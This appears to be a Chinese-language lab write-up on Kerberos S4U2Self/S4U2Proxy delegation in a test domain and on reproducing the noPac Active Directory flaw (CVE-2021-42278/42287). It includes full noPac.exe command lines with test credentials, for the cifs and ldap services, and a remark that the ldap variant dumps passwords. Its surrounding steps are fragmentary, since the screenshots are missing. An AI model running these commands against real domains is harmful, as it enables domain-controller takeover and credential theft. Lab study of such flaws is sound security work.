#S4U2SELF#S4U2Proxy#CVE-2021-42278/42287以及手动复现

目录

#S4U2SELF

Win08手动赋予委托服务属性

Win10身份验证

AS请求 

TGS请求

#S4U2Proxy 

申请其他服务 

#CVE-2021-42278/42287 

---

#S4U2SELF

s4u2 

@xwj456

可以看到普通用户是没用委托属性的 

Win08手动赋予委托服务属性

setspn -A wsw/wsw.com s4u2 

Win10身份验证

s4u2

@xwj456

AS请求 

两个勾

两个勾和include-pac记得按上（蓝色） ，发包之前把wireshark打开，方便记录和排查

TGS请求

上面四个勾+下面两个勾

#S4U2Proxy 

申请其他服务 

Win08添加

添加cifs

组策略管理 

注意这里是用户s4u2

成功添加

请求之前打开wireshark

AS请求（同上）

第一次TGS请求(同上)

第二次TGS请求 

include-pac按掉，S4U2SELF不要勾 

最后生成的那个票据重命名proxy，复制到工具里

#CVE-2021-42278/42287 

noPac.exe
noPac.exe -domain test.com -user krbuser -pass @xwj123 /dc WIN-8RSOOTMELL5.test.com /mAccount demohb /mPassword @xwj123 /service cifs /ptt

（黄色部分每次都要改一改，创建不同的计算机账户）

cifs只能访问C盘 

noPac.exe -domain test.com -user krbuser -pass @xwj123 /dc WIN-8RSOOTMELL5.test.com /mAccount demohb3 /mPassword @xwj123 /service ldap /ptt 

 这个可以把密码荡下来

手动复现

 

域用户用域控发包

  

这里可以找到它的域控